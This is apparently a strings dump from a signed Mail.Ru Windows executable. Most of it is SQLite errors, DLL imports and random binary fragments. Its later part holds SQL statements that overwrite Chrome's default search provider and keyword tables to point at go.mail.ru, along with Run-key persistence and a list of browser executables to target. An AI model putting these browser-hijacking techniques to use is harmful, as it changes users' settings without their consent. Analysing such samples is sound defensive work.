cannot use index: %s
at most %d tables in a join
at most %d tables in a join
cannot open value of type %s
cannot open value of type %s
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
unsupported file format
unsupported file format
no such trigger: %S
no such trigger: %S
unable to open database: %s
unable to open database: %s
database %s is already in use
database %s is already in use
too many attached databases - max %d
too many attached databases - max %d
sqlite_sequence
sqlite_sequence
there is already an index named %s
there is already an index named %s
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
no such index: %S
no such index: %S
unable to identify the object to be reindexed
unable to identify the object to be reindexed
no such table: %s
no such table: %s
sqlite_subquery_%p_
sqlite_subquery_%p_
cannot create INSTEAD OF trigger on table: %S
cannot create INSTEAD OF trigger on table: %S
cannot create %s trigger on view: %S
cannot create %s trigger on view: %S
cannot open %s column for writing
cannot open %s column for writing
no such column: "%s"
no such column: "%s"
cannot open view: %s
cannot open view: %s
cannot open virtual table: %s
cannot open virtual table: %s
indexed
indexed
foreign key
foreign key
sqlite_altertab_%s
sqlite_altertab_%s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
CREATE%s INDEX %.*s
CREATE%s INDEX %.*s
table %s has no column named %s
table %s has no column named %s
sqlite_autoindex_%s_%d
sqlite_autoindex_%s_%d
index %s already exists
index %s already exists
there is already a table named %s
there is already a table named %s
virtual tables may not be indexed
virtual tables may not be indexed
views may not be indexed
views may not be indexed
table %s may not be indexed
table %s may not be indexed
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
table "%s" has more than one primary key
table "%s" has more than one primary key
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE TABLE %Q.sqlite_sequence(name,seq)
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE %s %.*s
CREATE %s %.*s
view %s is circularly defined
view %s is circularly defined
table %S has no column named %s
table %S has no column named %s
%d values for %d columns
%d values for %d columns
table %S has %d columns but %d values were supplied
table %S has %d columns but %d values were supplied
*** in database %s ***
*** in database %s ***
unsupported encoding: %s
unsupported encoding: %s
foreign_key_list
foreign_key_list
no such column: %s
no such column: %s
there is already another table or index with this name: %s
there is already another table or index with this name: %s
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
view %s may not be altered
-- TRIGGER %s
-- TRIGGER %s
use DROP VIEW to delete view %s
use DROP VIEW to delete view %s
use DROP TABLE to delete table %s
use DROP TABLE to delete table %s
table %s may not be dropped
table %s may not be dropped
sqlite_stat
sqlite_stat
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
portuguese-brazilian
portuguese-brazilian
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
operator
operator
GetProcessWindowStation
GetProcessWindowStation
%s>
%s>
X;
X;
%s='%s'
%s='%s'
%s="%s"
%s="%s"
standalone="%s"
standalone="%s"
encoding="%s"
encoding="%s"
version="%s"
version="%s"
href="%s"
href="%s"
type="%s"
type="%s"
c:\trunk\3party\ticpp\ticpp.h
c:\trunk\3party\ticpp\ticpp.h
ticpp.cpp
ticpp.cpp
Type is unsupported
Type is unsupported
%d / %m / %y
%d / %m / %y
%I : %M : %S %p
%I : %M : %S %p
%m / %d / %y
%m / %d / %y
%b %d %H : %M : %S %Y
%b %d %H : %M : %S %Y
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegEnumKeyExW
RegEnumKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
ADVAPI32.dll
ADVAPI32.dll
FindExecutableW
FindExecutableW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
COMCTL32.dll
COMCTL32.dll
WS2_32.dll
WS2_32.dll
PSAPI.DLL
PSAPI.DLL
USERENV.dll
USERENV.dll
WTSAPI32.dll
WTSAPI32.dll
VERSION.dll
VERSION.dll
CreateIoCompletionPort
CreateIoCompletionPort
GetCPInfo
GetCPInfo
ShellExecuteExW
ShellExecuteExW
CoInternetParseUrl
CoInternetParseUrl
urlmon.dll
urlmon.dll
.?AVexception@sqlite@mailru@@
.?AVexception@sqlite@mailru@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$sp_counted_impl_p@Vdownload_limitation@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vdownload_limitation@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_file@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_file@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_string@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_string@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$_Ref_count@V?$vector@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@V?$allocator@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@@std@@@std@@@tr1@std@@
.?AV?$_Ref_count@V?$vector@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@V?$allocator@V?$basic_resolver_entry@Vtcp@ip@asio@boost@@@ip@asio@boost@@@std@@@std@@@tr1@std@@
.?AV?$service_base@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$service_base@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$service_base@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$service_base@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@
.?AV?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@
.?AV?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@
.?AV?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@
.?AVconnection_data@downloader_impl@http@mailru@@
.?AVconnection_data@downloader_impl@http@mailru@@
.?AVconnection_data_file@downloader_impl@http@mailru@@
.?AVconnection_data_file@downloader_impl@http@mailru@@
.?AVconnection_data_string@downloader_impl@http@mailru@@
.?AVconnection_data_string@downloader_impl@http@mailru@@
zcÃ
zcÃ
.OA/;ZeF
.OA/;ZeF
Dr%X/
Dr%X/
~.fj"
~.fj"
p>.kK
p>.kK
mÚ.E
mÚ.E
-1g}I
-1g}I
uC?]t%Uh
uC?]t%Uh
% g .gT*_
% g .gT*_
%s,i4
%s,i4
j~%cX
j~%cX
.zTYo*
.zTYo*
h?.wk
h?.wk
uecmdf
uecmdf
ir%Xd
ir%Xd
ug.um
ug.um
aLn%F.
aLn%F.
ov~.SJ
ov~.SJ
Nhn,.XW[0
Nhn,.XW[0
%2S$%G
%2S$%G
.Tt6@
.Tt6@
w;-cR}
w;-cR}
\|.Jk
\|.Jk
.pM**
.pM**
.cSKK
.cSKK
.TN&L*y;
.TN&L*y;
@`<.tn>
@`<.tn>
ObÓ>
ObÓ>
%fgR}2
%fgR}2
.Atf6
.Atf6
.GYC"
.GYC"
RKI%x[
RKI%x[
S=%D^r
S=%D^r
>.ym^
>.ym^
.cbO9ld
.cbO9ld
C.iXy\$
C.iXy\$
".WSs
".WSs
]f%s
]f%s
.uhV)
.uhV)
$,.NN
$,.NN
h.krO
h.krO
.Ig/'
.Ig/'
Ag.gi
Ag.gi
O:\"J
O:\"J
msgT'
msgT'
N9.fN
N9.fN
c29.zi.
c29.zi.
9L.HE
9L.HE
\R .wDuR
\R .wDuR
{Nù{*
{Nù{*
Wq.vYZ
Wq.vYZ
LJ@.km
LJ@.km
s(z%C
s(z%C
.wG;t
.wG;t
y%U?y
y%U?y
mL.JO
mL.JO
.Adtu
.Adtu
7.RTY
7.RTY
.IJsP
.IJsP
p\>7.CR
p\>7.CR
.PMs'.
.PMs'.
qb=c..lX
qb=c..lX
=n X%XM*]
=n X%XM*]
f.sM#
f.sM#
.ZT/X
.ZT/X
kkT?%d
kkT?%d
2D.uQ
2D.uQ
{|.By
{|.By
.ZWxs
.ZWxs
.yaNg
.yaNg
.FbJP
.FbJP
'U.zjf8U?
'U.zjf8U?
.SsKJ
.SsKJ
#.SC8K
#.SC8K
.BCeZ
.BCeZ
kX.EZ"
kX.EZ"
%x|N,f
%x|N,f
A2=.cr3
A2=.cr3
L4#z`%UYL
L4#z`%UYL
NKd%2s)$E
NKd%2s)$E
/t8%f
/t8%f
.Ks#2
.Ks#2
.pk"Q
.pk"Q
Y.aJn
Y.aJn
;D.PmTl
;D.PmTl
7sÔ
7sÔ
l|.iV
l|.iV
r0.CG
r0.CG
*.OW_I
*.OW_I
.jpSSQ
.jpSSQ
B.QsA
B.QsA
%Sm1Z$_
%Sm1Z$_
e-.SQ
e-.SQ
.NBU&
.NBU&
*(.wna
*(.wna
.JrOy
.JrOy
P.Cm|4!
P.Cm|4!
d};s{v.bS4
d};s{v.bS4
Ql.vJ0
Ql.vJ0
.MC _
.MC _
:~.fK
:~.fK
y.Nzp[
y.Nzp[
R.Si^
R.Si^
Ó='
Ó='
.ie6F
.ie6F
.g.bj
.g.bj
.Mw2%e/
.Mw2%e/
rTj%F
rTj%F
O31%Xb
O31%Xb
v~.UB
v~.UB
q.qoj
q.qoj
.gCiU
.gCiU
!P6:%u
!P6:%u
.mH7L%
.mH7L%
X0.bJn
X0.bJn
EVc.uk
EVc.uk
.uQbpc,
.uQbpc,
.PGs*GW
.PGs*GW
&%FNl8
&%FNl8
z.PpTq
z.PpTq
p%s&P
p%s&P
wìFf%S
wìFf%S
,E%C
,E%C
.OLrCM^
.OLrCM^
hX.Ri
hX.Ri
.hZOYQY$
.hZOYQY$
%d?aY
%d?aY
]}yZ%c
]}yZ%c
S÷O
S÷O
.PtYA
.PtYA
B.IDL-
B.IDL-
:RM!U}%F
:RM!U}%F
g.uGV
g.uGV
.FhJ?a
.FhJ?a
(G%X`
(G%X`
9.wK 1
9.wK 1
,.pXa
,.pXa
/.LTM
/.LTM
L.YG.q3b
L.YG.q3b
l.nBrb
l.nBrb
P.Lku
P.Lku
gÿ
gÿ
1=Bb/*>t
1=Bb/*>t
"fuDp
"fuDp
eZE.us
eZE.us
*".Wg
*".Wg
_.LW=
_.LW=
@\%0U
@\%0U
.SFi"
.SFi"
Cm.PT
Cm.PT
A.QRL^
A.QRL^
>..ci
>..ci
`.ZtKt
`.ZtKt
Q.lET
Q.lET
Jy%XsA-
Jy%XsA-
~.cVh
~.cVh
nB|exE:
nB|exE:
MN1).xx
MN1).xx
@.NN*
@.NN*
.WKKY
.WKKY
u.Wmf
u.Wmf
YzC.Ri
YzC.Ri
JMk.Wt
JMk.Wt
=[hR%uD
=[hR%uD
K:\ A`D
K:\ A`D
.lGBt
.lGBt
J(B%C
J(B%C
P.in@
P.in@
n?.EU
n?.EU
.yf"76
.yf"76
ûL)0%
ûL)0%
I.phM,1P
I.phM,1P
_.BtO
_.BtO
2h%d"9<_>
2h%d"9<_>
*F%s
*F%s
1n.Ab
1n.Ab
e%Cwj%
e%Cwj%
x.MEIR
x.MEIR
%DUo
%DUo
>d;.iY
>d;.iY
D99.vI|/
D99.vI|/
.qTB_
.qTB_
'zB&%F
'zB&%F
D2'.Ks
D2'.Ks
%cUA3
%cUA3
Lq.jb
Lq.jb
%S!pnw
%S!pnw
L %C
L %C
>THo0"%d(
>THo0"%d(
%fNC}=
%fNC}=
-K}B;-0
-K}B;-0
5%xSSg
5%xSSg
'
'
.beOV
.beOV
|8dq%f
|8dq%f
SqLM'
SqLM'
.Vw~%8
.Vw~%8
: L%uz|Y
: L%uz|Y
0On%CZ
0On%CZ
V.WGt
V.WGt
}uIg%S&
}uIg%S&
JoX.kQ
JoX.kQ
^.lA=
^.lA=
%sw|3}da@o`
%sw|3}da@o`
0%UDd}
0%UDd}
.Ig#|
.Ig#|
QV7.Cs
QV7.Cs
?s!%X
?s!%X
d"">%F
d"">%F
Y?.Es
Y?.Es
.dLJ]
.dLJ]
.aO_l
.aO_l
%D^w?
%D^w?
.lL"U
.lL"U
w.ayJ
w.ayJ
9JtCP
9JtCP
b.hVP
b.hVP
E$/")%c
E$/")%c
~2.xmc
~2.xmc
]$[.ii
]$[.ii
e".EI
e".EI
D%xgT
D%xgT
.Jr9Q
.Jr9Q
@m.wG
@m.wG
Zn.LZN
Zn.LZN
%FKDhM
%FKDhM
k3:%s
k3:%s
h>.Oa:
h>.Oa:
.EM3_
.EM3_
!.Wq%
!.Wq%
gN4.fy
gN4.fy
D\%X:
D\%X:
.licB
.licB
#RsSHIz-
#RsSHIz-
%U$$F
%U$$F
Ni.AI
Ni.AI
1G.Dn
1G.Dn
.XMeD
.XMeD
.lW@>A
.lW@>A
Vq.Zy*F
Vq.Zy*F
=/355>*0
=/355>*0
.Rd?9
.Rd?9
s:\h:
s:\h:
^m.hL
^m.hL
.Cki'
.Cki'
of%s
of%s
%s.SE
%s.SE
õ>lH
õ>lH
e(`ú
e(`ú
.MJ>:
.MJ>:
%uV[n*
%uV[n*
j%CPT
j%CPT
Ld5%cvE
Ld5%cvE
LY6.FT
LY6.FT
5.Wj?
5.Wj?
.Ul\tq
.Ul\tq
.TH/Xf
.TH/Xf
.vy-J
.vy-J
MO).Gx.L,
MO).Gx.L,
.kv]b_
.kv]b_
qU.fU
qU.fU
.CU.s
.CU.s
v.Wpd
v.Wpd
.fog^GqFR
.fog^GqFR
.}X.pI
.}X.pI
uMSg
uMSg
%s{5G
%s{5G
9x.cF>
9x.cF>
3t.ltX
3t.ltX
.eS]K
.eS]K
gb.BK
gb.BK
.YP&dS
.YP&dS
A%%C 9
A%%C 9
m.CGK
m.CGK
1.xZH-
1.xZH-
b}D%x^-
b}D%x^-
@&im'Y%sG
@&im'Y%sG
z#.dJ
z#.dJ
.rb(J)
.rb(J)
-DpP}0
-DpP}0
%x~z[N
%x~z[N
d`X` Aù
d`X` Aù
B.wkciR
B.wkciR
&j.dJO
&j.dJO
O%x$=
O%x$=
%X*;V
%X*;V
.hfx6
.hfx6
K.Uwa9
K.Uwa9
r.iEBd:*g
r.iEBd:*g
U#;.bAU\
U#;.bAU\
V.jRk/
V.jRk/
sum[.Unj
sum[.Unj
0%XZ^2$_
0%XZ^2$_
.wM!"d
.wM!"d
yN-S}~
yN-S}~
uRl;n6n
uRl;n6n
,%C'^m
,%C'^m
0q.qE^
0q.qE^
.xq7:
.xq7:
õ%t
õ%t
D-..PqT
D-..PqT
6O%H.vK
6O%H.vK
>.vL|
>.vL|
1B.dc
1B.dc
.sHl\(?#
.sHl\(?#
h'\.Ye
h'\.Ye
.rydp
.rydp
k.Ch1
k.Ch1
s}C7#%x!
s}C7#%x!
).Tv8
).Tv8
.IL`B
.IL`B
V%d?@
V%d?@
.DR[
.DR[
g2wOq.xb
g2wOq.xb
(.JeH
(.JeH
W%S[t
W%S[t
6t%f[
6t%f[
/R.ph
/R.ph
ntc.qt
ntc.qt
ShellExecuteW
ShellExecuteW
2(2.272>2`2
2(2.272>2`2
>=
>=
?:97410"
?:97410"
;85&%$#!
;85&%$#!
/* 231'9:;
/* 231'9:;
D.jn#k
D.jn#k
üc5tFV
üc5tFV
LLC Mail.Ru1
LLC Mail.Ru1
LLC Mail.Ru0
LLC Mail.Ru0
*hXXp://cs-g2-crl.thawte.com/ThawteCSG2.crl0
*hXXp://cs-g2-crl.thawte.com/ThawteCSG2.crl0
hXXp://ocsp.thawte.com0
hXXp://ocsp.thawte.com0
Certification Services Division1806
Certification Services Division1806
#hXXp://crl.thawte.com/ThawtePCA.crl0
#hXXp://crl.thawte.com/ThawtePCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Thawte Certification1
Thawte Certification1
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
6)6/666=6
6)6/666=6
9)9/969=9
9)9/969=9
>)>/>6>=>
>)>/>6>=>
00K0R0[0i0
00K0R0[0i0
4%4X5c5v5
4%4X5c5v5
5`6F6X6
5`6F6X6
00F1Z1
00F1Z1
4%4U4o4
4%4U4o4
4 4'484
4 4'484
1(2.242?2{2
1(2.242?2{2
5"6(6/666|6
5"6(6/666|6
?%? ?1?
?%? ?1?
12x2f4x4
12x2f4x4
0 0$0(0,0004080
0 0$0(0,0004080
9 9$9(9,9094989
9 9$9(9,9094989
9(9,90949
9(9,90949
7%7|7&8
7%7|7&8
3 3$3(3,303
3 3$3(3,303
(031=1^1
(031=1^1
:*;0;4;8;
:*;0;4;8;
1%2U2z2
1%2U2z2
5 5$5(5,5054585
5 5$5(5,5054585
687
687
7 7$7(7,7074787
7 7$7(7,7074787
> >@>\>`>
> >@>\>`>
0 0$0,0@0\0`0
0 0$0,0@0\0`0
4$4,484\4
4$4,484\4
manifest.json
manifest.json
URLS
URLS
Advapi32.dll
Advapi32.dll
Fsqlite3_reset
Fsqlite3_reset
Asqlite3_bind_text16
Asqlite3_bind_text16
@sqlite3_exec
@sqlite3_exec
version.txt
version.txt
chrome.exe
chrome.exe
UPDATE ItemTable SET value = ? WHERE key = ?
UPDATE ItemTable SET value = ? WHERE key = ?
Local Storage/chrome-extension_jaocgokledfmfebefgbeokdodbbdjhdd_0.localstorage
Local Storage/chrome-extension_jaocgokledfmfebefgbeokdodbbdjhdd_0.localstorage
Web Data
Web Data
Google/Chrome/Application/chrome.exe
Google/Chrome/Application/chrome.exe
p1.0.15_0
p1.0.15_0
res:\\BIN\IDR_CHROME_MAILTABS
res:\\BIN\IDR_CHROME_MAILTABS
%SUGGEST_URL%
%SUGGEST_URL%
UPDATE keywords SET suggest_url = '%SUGGEST_URL%' WHERE keyword like '%mail.ru%'
UPDATE keywords SET suggest_url = '%SUGGEST_URL%' WHERE keyword like '%mail.ru%'
Software/Microsoft/Windows/CurrentVersion/Uninstall
Software/Microsoft/Windows/CurrentVersion/Uninstall
Google/Chrome/User Data/Default
Google/Chrome/User Data/Default
Google Chrome
Google Chrome
Software/Microsoft/Windows/CurrentVersion/Run
Software/Microsoft/Windows/CurrentVersion/Run
update.exe
update.exe
WHERE key='Default Search Provider ID'
WHERE key='Default Search Provider ID'
e_locales/%1%/messages.json
e_locales/%1%/messages.json
__MSG_
__MSG_
chrome-extension://%1%/%2%
chrome-extension://%1%/%2%
select k.url from meta m, keywords k where m.key='Default Search Provider ID' and m.value=k.id
select k.url from meta m, keywords k where m.key='Default Search Provider ID' and m.value=k.id
select value from meta where key='Default Search Provider ID'
select value from meta where key='Default Search Provider ID'
select url from keywords where id = %1%
select url from keywords where id = %1%
ALTER TABLE keywords ADD COLUMN search_terms_replacement_key VARCHAR DEFAULT ''
ALTER TABLE keywords ADD COLUMN search_terms_replacement_key VARCHAR DEFAULT ''
ALTER TABLE keywords ADD COLUMN alternate_urls VARCHAR DEFAULT ''
ALTER TABLE keywords ADD COLUMN alternate_urls VARCHAR DEFAULT ''
SELECT * FROM keywords
SELECT * FROM keywords
DELETE FROM keywords WHERE short_name = '@MAIL.RU'
DELETE FROM keywords WHERE short_name = '@MAIL.RU'
SELECT id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
SELECT id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
' WHERE key = 'Default Search Provider ID Backup'
' WHERE key = 'Default Search Provider ID Backup'
' WHERE key = 'Default Search Provider ID'
' WHERE key = 'Default Search Provider ID'
SELECT id, prepopulate_id FROM keywords
SELECT id, prepopulate_id FROM keywords
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'mail.ru' COLLATE NOCASE
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'go.mail.ru' COLLATE NOCASE
SELECT id , prepopulate_id FROM keywords WHERE keyword = 'go.mail.ru' COLLATE NOCASE
UPDATE keywords SET short_name = '
UPDATE keywords SET short_name = '
@Mail.Ru', keyword = 'go.mail.ru', favicon_url = 'hXXp://go.mail.ru/favicon.ico', url = 'hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg%RFR%',show_in_default_list = '1' WHERE id = '%ID%'
@Mail.Ru', keyword = 'go.mail.ru', favicon_url = 'hXXp://go.mail.ru/favicon.ico', url = 'hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg%RFR%',show_in_default_list = '1' WHERE id = '%ID%'
@Mail.Ru','go.mail.ru','hXXp://go.mail.ru/favicon.ico','hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg',1,1,'',1333701777,0,'windows-1251','hXXp://suggests.go.mail.ru/ff3?q={searchTerms}',%PREPOPULATE_ID%,0,'',0,'03095DE3-A6E7-4793-A20C-399A0F4A92E1'
@Mail.Ru','go.mail.ru','hXXp://go.mail.ru/favicon.ico','hXXp://go.mail.ru/search?q={searchTerms}&fr=ntg',1,1,'',1333701777,0,'windows-1251','hXXp://suggests.go.mail.ru/ff3?q={searchTerms}',%PREPOPULATE_ID%,0,'',0,'03095DE3-A6E7-4793-A20C-399A0F4A92E1'
id, short_name, keyword, favicon_url, url, show_in_default_list, safe_for_autoreplace, originating_url, date_created, usage_count, input_encodings, suggest_url, prepopulate_id, created_by_policy, instant_url, last_modified, sync_guid
id, short_name, keyword, favicon_url, url, show_in_default_list, safe_for_autoreplace, originating_url, date_created, usage_count, input_encodings, suggest_url, prepopulate_id, created_by_policy, instant_url, last_modified, sync_guid
INSERT INTO keywords
INSERT INTO keywords
SELECT value FROM meta WHERE key = 'version'
SELECT value FROM meta WHERE key = 'version'
select * from keywords
select * from keywords
keywords
keywords
No go.mail.ru in chromium
No go.mail.ru in chromium
select id, short_name from keywords where url like '%go.mail.ru%' COLLATE NOCASE
select id, short_name from keywords where url like '%go.mail.ru%' COLLATE NOCASE
. url =
. url =
{A12C4AB1-F4D0-4771-8C21-613E9D12491F}
{A12C4AB1-F4D0-4771-8C21-613E9D12491F}
chrome-extension://hcncjpganfocbfoenaemagjjopkkindp/visual-bookmarks.html
chrome-extension://hcncjpganfocbfoenaemagjjopkkindp/visual-bookmarks.html
chrome-extension://jaocgokledfmfebefgbeokdodbbdjhdd/visual-bookmarks.html
chrome-extension://jaocgokledfmfebefgbeokdodbbdjhdd/visual-bookmarks.html
)Software/Mail.Ru/IE_Bar
)Software/Mail.Ru/IE_Bar
Software/AppDataLow/Software/Mail.Ru/IE_Bar
Software/AppDataLow/Software/Mail.Ru/IE_Bar
Software/Mail.Ru/Updater
Software/Mail.Ru/Updater
Software\Mail.Ru\Flags
Software\Mail.Ru\Flags
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall
SOFTWARE/Mail.Ru
SOFTWARE/Mail.Ru
{09900DE8-1DCA-443F-9243-26FF581438AF}
{09900DE8-1DCA-443F-9243-26FF581438AF}
{58810E75-E249-44C6-B989-11D227263E24}
{58810E75-E249-44C6-B989-11D227263E24}
{91397D20-1446-11D4-8AF4-0040CA1127B6}
{91397D20-1446-11D4-8AF4-0040CA1127B6}
{95289393-33EA-4F8D-B952-483415B9C955}
{95289393-33EA-4F8D-B952-483415B9C955}
hXXp://mrb.mail.ru/update/2/
hXXp://mrb.mail.ru/update/2/
hXXp://suggests.go.mail.ru/ie8?q={SearchTerms}
hXXp://suggests.go.mail.ru/ie8?q={SearchTerms}
{FFEBBF0A-C22C-4172-89FF-45215A135AC7}
{FFEBBF0A-C22C-4172-89FF-45215A135AC7}
Mail.Ru
Mail.Ru
iexplore.exe
iexplore.exe
{37964A3C-4EE8-47b1-8321-34DE2C39BA4D}
{37964A3C-4EE8-47b1-8321-34DE2C39BA4D}
firefox.exe
firefox.exe
opera.exe
opera.exe
SOFTWARE/Google/Chrome/Extensions
SOFTWARE/Google/Chrome/Extensions
amigo.exe
amigo.exe
nichrome.exe
nichrome.exe
browser.exe
browser.exe
Software/Mail.Ru/ChromeInstaller
Software/Mail.Ru/ChromeInstaller
Software/Mail.Ru/mTorrent
Software/Mail.Ru/mTorrent
F777C640-57F8-4ECE-A40B-F571D25C2EFE
F777C640-57F8-4ECE-A40B-F571D25C2EFE
opera
opera
firefox
firefox
google chrome
google chrome
Software/Microsoft/Windows/CurrentVersion/Uninstall/Amigo
Software/Microsoft/Windows/CurrentVersion/Uninstall/Amigo
Software/Microsoft/Windows/CurrentVersion/Uninstall/xpom
Software/Microsoft/Windows/CurrentVersion/Uninstall/xpom
xpom.exe
xpom.exe
Software/Microsoft/Windows/CurrentVersion/Uninstall/YandexBrowser
Software/Microsoft/Windows/CurrentVersion/Uninstall/YandexBrowser
Software/Microsoft/Windows/CurrentVersion/Uninstall/{1B89BC31-F539-4EBD-B94F-C24705C73433}
Software/Microsoft/Windows/CurrentVersion/Uninstall/{1B89BC31-F539-4EBD-B94F-C24705C73433}
Software/Microsoft/Windows/CurrentVersion/Uninstall/Xpom
Software/Microsoft/Windows/CurrentVersion/Uninstall/Xpom
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Bromium
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Bromium
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Google Chrome
SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Google Chrome
launcher.exe
launcher.exe
.html
.html
Software/Mail.ru/Tech/ptls
Software/Mail.ru/Tech/ptls
Software/Mail.Ru/Guard
Software/Mail.Ru/Guard
C.delay
C.delay
go_internet.exe
go_internet.exe
rMailRuUpdater.exe
rMailRuUpdater.exe
Mail.Ru/MailRuUpdater.exe
Mail.Ru/MailRuUpdater.exe
delete from keywords
delete from keywords
UPDATE keywords SET show_in_default_list = '1' WHERE keyword like '%mail.ru%'
UPDATE keywords SET show_in_default_list = '1' WHERE keyword like '%mail.ru%'
suggests.go.mail.ru
suggests.go.mail.ru
go.mail.ru/search
go.mail.ru/search
hXXp://go.mail.ru/search?q={searchTerms}&fr=mrch&fr3=
hXXp://go.mail.ru/search?q={searchTerms}&fr=mrch&fr3=
Software\Mail.Ru\ChromeInstaller
Software\Mail.Ru\ChromeInstaller
(.*yandex\.ru. clid.*|.*soft.yandex.*)
(.*yandex\.ru. clid.*|.*soft.yandex.*)
SELECT * FROM ItemTable where key like '%url%'
SELECT * FROM ItemTable where key like '%url%'
Xpom/Application/chrome.exe
Xpom/Application/chrome.exe
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
